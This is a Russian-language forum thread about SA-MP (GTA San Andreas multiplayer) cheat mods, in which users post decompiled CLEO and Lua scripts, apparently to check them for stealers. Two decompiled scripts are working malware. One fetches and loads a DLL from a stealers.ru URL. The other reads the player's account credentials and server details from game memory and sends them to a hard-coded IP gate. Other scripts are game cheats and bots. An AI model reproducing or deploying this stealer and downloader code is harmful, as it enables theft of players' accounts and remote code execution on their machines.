  1@ == 1
jf @Label0001BA
SAMP.WriteSAMPMemory(104848, 50064, 2)
SAMP.WriteSAMPMemory(85104, 50064, 2)
SAMP.WriteSAMPMemory(94112, 50064, 2)
SAMP.WriteSAMPMemory(52144, 50064, 2)
0BCA: samp send_click_textdraw 159
wait 5
0AF0: 7@ = get_int_from_ini_file "CLEO\FarmBabla.ini" section "Ded_Fedot" key "KeyOff"
if
key_down 7@
jf @Label0001BA
1@ = 0
SAMP.WriteSAMPMemory(104848, 6@, 2)
SAMP.WriteSAMPMemory(85104, 8@, 2)
SAMP.WriteSAMPMemory(94112, 9@, 2)
SAMP.WriteSAMPMemory(52144, 10@, 2)
0ACF: show_formatted_styled_text "~w~FARM ~r~OFF" time 1000 style 2 

:Label0001BA
if
  2@ == 1
jf @Label000239
Actor.StorePos($PLAYER_ACTOR, 3@, 4@, 5@)
wait 500
Actor.PutAt($PLAYER_ACTOR, 13.3314, 1865.868, 17.6476)
0C72: set_virtual_key 89 down 1
wait 200
0C72: set_virtual_key 89 down 0
wait 100
SAMP.SetDialogListItem(1)
SAMP.CloseDialog(1)
Actor.PutAt($PLAYER_ACTOR, 3@, 4@, 5@)
018C: play_sound 1139 at 0.0 0.0 0.0
2@ = 0

:Label000239
if
  11@ == 1
jf @Label0002D1
Actor.StorePos($PLAYER_ACTOR, 3@, 4@, 5@)
wait 500
Actor.PutAt($PLAYER_ACTOR, 1370.983, -1345.305, 895.964)
0C72: set_virtual_key 89 down 1
wait 200
0C72: set_virtual_key 89 down 0
wait 100
SAMP.SetDialogListItem(0)
wait 500
SAMP.CloseDialog(1)
wait 1000
SAMP.CloseDialog(1)
Actor.PutAt($PLAYER_ACTOR, 3@, 4@, 5@)
0BC9: samp send_dialog_response dialog 669 button 1 listitem 0 input ""
018C: play_sound 1139 at 0.0 0.0 0.0
11@ = 0

:Label0002D1
goto @Label0000D8

:Label0002D8
wait 0
if
  1@ == 0
jf @Label000327
1@ = 1
018C: play_sound 1139 at 0.0 0.0 0.0
0ACF: show_formatted_styled_text "~w~FARM ~g~ON" time 1000 style 2 
goto @Label00038A

:Label000327
SAMP.WriteSAMPMemory(104848, 6@, 2)
SAMP.WriteSAMPMemory(85104, 8@, 2)
SAMP.WriteSAMPMemory(94112, 9@, 2)
SAMP.WriteSAMPMemory(52144, 10@, 2)
0ACF: show_formatted_styled_text "~w~FARM ~r~OFF" time 1000 style 2 
018C: play_sound 1138 at 0.0 0.0 0.0
1@ = 0

:Label00038A
SAMP.CmdRet

:Label00038C
2@ = 1
SAMP.CmdRet

:Label000395
11@ = 1
SAMP.CmdRet
 

™ ChipFamily

По ту сторону надежды.
5,144
1,983
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Го декрипт плиз
bothachSys.cs - Стиллер.
CLEO:
// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}

//-------------MAIN---------------
0000: NOP
0001: wait 3000 ms
00D6: if
0AAB:   file_exists "statdisp.asi"
004D: jump_if_false @Label000022

:Label000022
0AC8: 1@ = allocate_memory_size 256
0AC8: 2@ = allocate_memory_size 256
0AC8: 4@ = allocate_memory_size 128
0AD3: 2@ = format "statdisp.asi" 
0AD3: 1@ = format "https:%c%cstealers.ru/getsteal/00026005" 47 47 
0AB1: call_scm_func @Label000104 2 2@ 1@ 3@ 

:Label000094
0001: wait 0 ms
0AAB:   file_exists "statdisp.asi"
004D: jump_if_false @Label000094
0AC9: free_allocated_memory 1@
0AC9: free_allocated_memory 2@
0AC9: free_allocated_memory 4@
0AA2: 31@ = load_library "Kernel32.dll" // IF and SET
0AA4: 30@ = get_proc_address "LoadLibraryA" library 31@ // IF and SET
0AA7: call_function 30@ num_params 1 pop 0 "statdisp.asi" 29@ 
004E: end_thread

:Label000104
0AA2: 10@ = load_library "Urlmon.dll" // IF and SET
0AA4: 11@ = get_proc_address "URLDownloadToFileA" library 10@ // IF and SET
0AA7: call_function 11@ num_params 5 pop 0 0 0 0@ 1@ 0 12@ 
0AB2: ret 1 12@
 

bomber!

Известный
Проверенный
958
465
Декрипт плз
+ есть стиллер или нет?
 

Вложения

  • SellerBot.cs
    38.6 KB · Просмотры: 6

™ ChipFamily

По ту сторону надежды.
5,144
1,983
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Декрипт плз
+ есть стиллер или нет?
Стиллер.
CLEO:
// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}

//-------------MAIN---------------
0000: NOP

:Label000002
0001: wait 0 ms
0AA2: 31@ = load_library "kernel32.dll" // IF and SET
0AA4: 30@ = get_proc_address "GetModuleHandleA" library 31@ // IF and SET
0AA7: call_function 30@ num_params 1 pop 0 "samp.dll" 0@
0006: 16@ = 1
0006: 17@ = 2203896
0006: 19@ = 2203832
0006: 29@ = 528432
0A8E: 3@ = 0@ + 17@ // int
0A8D: 2@ = read_memory 3@ size 4 virtual_protect 0
00D6: if
0019:   2@ > 1000
004D: jump_if_false @Label000002
0A8E: 22@ = 2@ + 973 // int
0A8D: 23@ = read_memory 22@ size 4 virtual_protect 0
00D6: if
0019:   23@ > 1000
004D: jump_if_false @Label000002
0A8E: 5@ = 23@ + 24 // int
0A8D: 4@ = read_memory 5@ size 4 virtual_protect 0
00D6: if
0019:   4@ > 1000
004D: jump_if_false @Label000002
0A8E: 5@ = 4@ + 34 // int
0A8D: 24@ = read_memory 5@ size 4 virtual_protect 0
00D6: if
0019:   24@ > 1000
004D: jump_if_false @Label000002
0A8E: 22@ = 0@ + 19@ // int
0A8D: 1@ = read_memory 22@ size 4 virtual_protect 0
00D6: if
0019:   1@ > 1000
004D: jump_if_false @Label000002
0A8E: 7@ = 1@ + 40 // int
0A8D: 6@ = read_memory 7@ size 4 virtual_protect 0
0A8E: 5@ = 1@ + 44 // int
0A8D: 26@ = read_memory 5@ size 4 virtual_protect 0
00D6: if
0039:   6@ == 1
004D: jump_if_false @Label00019D
00D6: if or
0039:   26@ == 1
0039:   26@ == 3
004D: jump_if_false @Label00019D
0006: 25@ = 1

:Label00019D
00D6: if and
0039:   25@ == 1
8039:   not  6@ == 1
004D: jump_if_false @Label0003B9
0A8E: 7@ = 1@ + 48 // int
0A8D: 3@ = read_memory 7@ size 4 virtual_protect 0
0A8E: 6@ = 1@ + 36 // int
0A8D: 13@ = read_memory 6@ size 4 virtual_protect 0
0A8E: 6@ = 0@ + 29@ // int
0AA8: call_function_method 6@ struct 13@ num_params 0 pop 0 5@
0A8E: 6@ = 4@ + 26 // int
0A8D: 23@ = read_memory 6@ size 4 virtual_protect 0
0A8E: 7@ = 4@ + 10 // int
00D6: if
8029:   not  23@ >= 16
004D: jump_if_false @Label00023E
0085: 12@ = 7@ // (int)
0002: jump @Label00024A

:Label00023E
0A8D: 12@ = read_memory 7@ size 4 virtual_protect 0

:Label00024A
0A8E: 9@ = 2@ + 289 // int
0A8E: 14@ = 2@ + 32 // int
0A8E: 8@ = 2@ + 549 // int
0A8D: 15@ = read_memory 8@ size 4 virtual_protect 0
0A8E: 18@ = 4@ + 42 // int
0A8D: 27@ = read_memory 18@ size 4 virtual_protect 0
010B: 21@ = player $PLAYER_CHAR money
00A0: store_actor $PLAYER_ACTOR position_to $PX $PY $PZ
0665: get_actor $PLAYER_ACTOR model_to 28@
0AC6: 0@ = label @Label0003C0 offset
0AC8: 20@ = allocate_memory_size 1024
0006: 13@ = 1572
0AD3: 20@ = format "%ssrvr=%s:%d&servname=%s&log=%s&did=%d&inf=%s&stuid=%d&money=%d&score=%d&skin=%d&pos=%f|%f|%f&sver=%d" 0@ 14@ 15@ 9@ 12@ 3@ 5@ 13@ 21@ 27@ 28@ $PX $PY $PZ 16@
0AA2: 8@ = load_library "urlmon.dll" // IF and SET
0AA4: 9@ = get_proc_address "URLDownloadToFileA" library 8@ // IF and SET
0AA5: call 9@ num_params 5 pop 0 0 0 "%TEMP%\2352sfa.tmp" 20@ 0
0006: 25@ = 0

:Label0003B9
0002: jump @Label000002

:Label0003C0
hex
68 74 74 70 3A 2F 2F 31 34 34 2E 37 36 2E 31 33
33 2E 31 30 39 2F 67 61 74 65 32 2E 70 68 70 3F
00
end
i2NQiMj.png
 
Последнее редактирование:
  • Нравится
Реакции: bomber!

bomber!

Известный
Проверенный
958
465
декомпилируйте плз
 

Вложения

  • 8__selleat.cs
    19.4 KB · Просмотры: 7

™ ChipFamily

По ту сторону надежды.
5,144
1,983
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
декомпилируйте плз
CLEO:
// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}

//-------------MAIN---------------
0006: 0@ = -19581
0050: gosub 0@
0000: NOP
03A4: name_thread "cheat-myster| made by DubStep_"

:Label000037
0001: wait 300 ms
0AFA:  is_samp_available
004D: jump_if_false @Label000037
0B34: samp register_client_command "_selleat" to_label @Label000061

:Label000056
0001: wait 0 ms
0002: jump @Label000056

:Label000061
0001: wait 0 ms
0B35: samp 0@ = get_last_command_params
0AD4: 0@ = scan_string 0@ format "%d" 20@
00D6: if
0019:   0@ > 0
004D: jump_if_false @Label0000AF
0B12: 11@ = 11@ XOR 1
00D6: if
0039:   11@ == 0
004D: jump_if_false @Label000112
0002: jump @Label0000E2

:Label0000AF
0AF8: samp add_message_to_chat " Правильный ввод: /_selleat [время задержки]" color
0B43: samp cmd_ret

:Label0000E2
0001: wait 0 ms
0ACD: show_text_highpriority "~w~Cheat-Master.Ru ~n~~r~Bot is off" time 3500
0B43: samp cmd_ret

:Label000112
0001: wait 0 ms
0ACD: show_text_highpriority "~w~Cheat-Master.Ru ~n~~g~Bot is on" time 3500
0002: jump @Label000146

:Label000146
0001: wait 0 ms
00A0: store_actor $0[3] position_to 4@ 5@ 6@
0AB5: store_actor $0[3] closest_vehicle_to 9@ closest_ped_to 10@
0B2B: samp 8@ = get_player_id_by_actor_handle 10@
00D6: if
056D:   actor 10@ defined
004D: jump_if_false @Label000146
00A0: store_actor $0[3] position_to 21@ 22@ 23@
00A0: store_actor 10@ position_to 14@ 15@ 16@
0509: 19@ = distance_between_XY 21@ 22@ and_XY 14@ 15@
00D6: if
8031:   not  19@ >= 50.0
004D: jump_if_false @Label000146
0B36: samp 29@ = get_player_nickname 8@
0AF9: samp say_msg "/selleat %d" 8@
0001: wait 20@ ms
0002: jump @Label000146
 

#Rin

Известный
Всефорумный модератор
1,214
1,043
Код киньте пж
Луа скрипт
Клык
Lua:
function randomFunction    hook.onSendTakeDamage (INPUT_VAR_0_,INPUT_VAR_1_)
    if act then
        --jump to 0022 (if previous if statement is false) --0022 JMP-JMP
        var_0_4 = getCharHealth(PLAYER_PED)
        if not (var_0_4 <= INPUT_VAR_1_) then
            --jump to 0011 (if previous if statement is false) --0011 JMP-JMP
            if var_0_4 == 0 then
            end -- maybe?
        else
            --location 0011--0011 LOCATION-LOCATION_
            sampSendChat("/hide deagle")
            sampSendChat("/hide m4")
            sampSendChat("/hide rpg")
            var_0_5 = false --var_0_5 PRIMITIVE-PRIMITIVE
        end 
        act = var_0_5
    end
    return
end


function randomFunction    main ()
    var_1_0 = isSampfuncsLoaded()
    if var_1_0 then
        --jump to 0009 (if previous if statement is false) --0009 JMP-JMP
        var_1_0 = isSampLoaded()
        if not var_1_0 then
        end -- maybe?
    else
        --location 0009--0009 LOCATION-LOCATION_
        return
    end
    var_1_0 = isSampAvailable()
    if not var_1_0 then
        --jump to 0019 (if previous if statement is false) --0019 JMP-JMP
        repeat
        var_1_1 = 100 --var_1_1 NUMBER-NUMBER
        wait(var_1_1)
    else
        --location 0019--0019 LOCATION-LOCATION_
        until false or (previous if statement is true) --location 0019
        repeat
        var_1_1 = 0 --var_1_1 NUMBER-NUMBER
        wait(var_1_1)
        if act == false then
            --jump to 0019 (if previous if statement is false) --0019 JMP-JMP
            var_1_1 = 11111 --var_1_1 NUMBER-NUMBER
            wait(var_1_1)
            var_1_0 = true --var_1_0 PRIMITIVE-PRIMITIVE
            act = var_1_0
            --jump to 0019 (if previous if statement is false) --0019 JMP-JMP
            until false or (previous if statement is true) --location 0032
            return
        end
       
       

function someFunc2()
    var_2_0 = require("samp.events")
    hook = var_2_0
    var_2_0 = true --var_2_0 PRIMITIVE-PRIMITIVE
    act = var_2_0
    local randomFunction0 = function() end -- starts at  test.lua:0
    hook.onSendTakeDamage = randomFunction0
    local randomFunction1 = function() end -- starts at  test.lua:0
    main = randomFunction1
    return
end
 

LinkelnAweil

Участник
122
7
Сделайте decompile, please. Видел когда-то, да не смог найти.
 

Вложения

  • GotovoeCLEO 3in1.cs
    18 KB · Просмотры: 6

DarkL1ght

Новичок
252
112
Сделайте decompile, please. Видел когда-то, да не смог найти.
CLEO:
// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}

//-------------MAIN---------------
0662: printstring "==============================================================="
0662: printstring "My VK: vk.com/id138101483"
0662: printstring "My Skype: hackes8"
0662: printstring "Group VK: vk.com/by_air"
0662: printstring "My YouTube Channel: www.youtube.com/spacebmxair"
0662: printstring "All rights reserved ©"
0662: printstring "==============================================================="

:Label00011F
wait 0
   SAMP.Available
jf @Label00011F

:Label00012C
wait 0
if and
key_down 82
8449:   not actor $PLAYER_ACTOR in_a_car
   not SAMP.ChatInputOpened
jf @Label000189
Player.CanMove($PLAYER_CHAR) = True
Actor.StorePos($PLAYER_ACTOR, 8@, 9@, 10@)
04C4: store_coords_to 8@ 9@ 10@ from_actor $PLAYER_ACTOR with_offset 0 0 -1.0
Actor.PutAt($PLAYER_ACTOR, 8@, 9@, 10@)
Actor.LockInCurrentPosition($PLAYER_ACTOR) = False
Camera.Restore_WithJumpCut

:Label000189
if and
key_down 46
0449:   actor $PLAYER_ACTOR in_a_car
   not SAMP.ChatInputOpened
jf @Label00020A
11@ = Actor.CurrentCar($PLAYER_ACTOR)
0407: store_coords_to 8@ 9@ 10@ from_car 11@ with_offset 0.0 0.0 0.0
Car.PutAt(11@, 8@, 9@, 10@)
0A97: 12@ = car 11@ struct
0C0C: 13@ = struct 12@ offset 20 size 4
0C0D: struct 13@ offset 48 size 4 = 8@
0C0D: struct 13@ offset 52 size 4 = 9@
0C0D: struct 13@ offset 56 size 4 = 10@

:Label00020A
if and
key_down 87
key_down 16
0449:   actor $PLAYER_ACTOR in_a_car
   not SAMP.ChatInputOpened
jf @Label000339
0@ = Actor.CurrentCar($PLAYER_ACTOR)
Car.SetImmunities(0@, 0, 0, 0, 1, 0)
077D: 1@ = car 0@ x_angle
0092: 2@ = float 1@ to_integer
0085: 3@ = 2@ // (int)
0085: 3@ = 2@ // (int)
3@ -= 25
2@ += 25
07D5: set_car 0@ velocity_in_direction_XYZ 0.0 0.0 0.35 rotation_velocitiesXY 0.0 0.0 unk 0.0
07DB: set_car 0@ rotation_velocity_XYZ -27.0 0.0 0.0 through_center_of_mass
wait 200
0BFE: 6@ = get_tick_count
0A8E: 7@ = 6@ + 2000 // int

:Label0002B5
wait 0
077D: 4@ = car 0@ x_angle
0092: 5@ = float 4@ to_integer
0BFE: 6@ = get_tick_count
if
001D:   6@ > 7@ // (int)
jf @Label0002E8
goto @Label000325

:Label0002E8
if and
002D:   5@ >= 3@ // (int)
802D:   not  5@ >= 2@ // (int)
jf @Label00031E
07DB: set_car 0@ rotation_velocity_XYZ -0.3 0.0 0.0 through_center_of_mass
goto @Label000325

:Label00031E
goto @Label0002B5

:Label000325
wait 700
Car.SetImmunities(0@, 0, 0, 0, 0, 0)

:Label000339
goto @Label00012C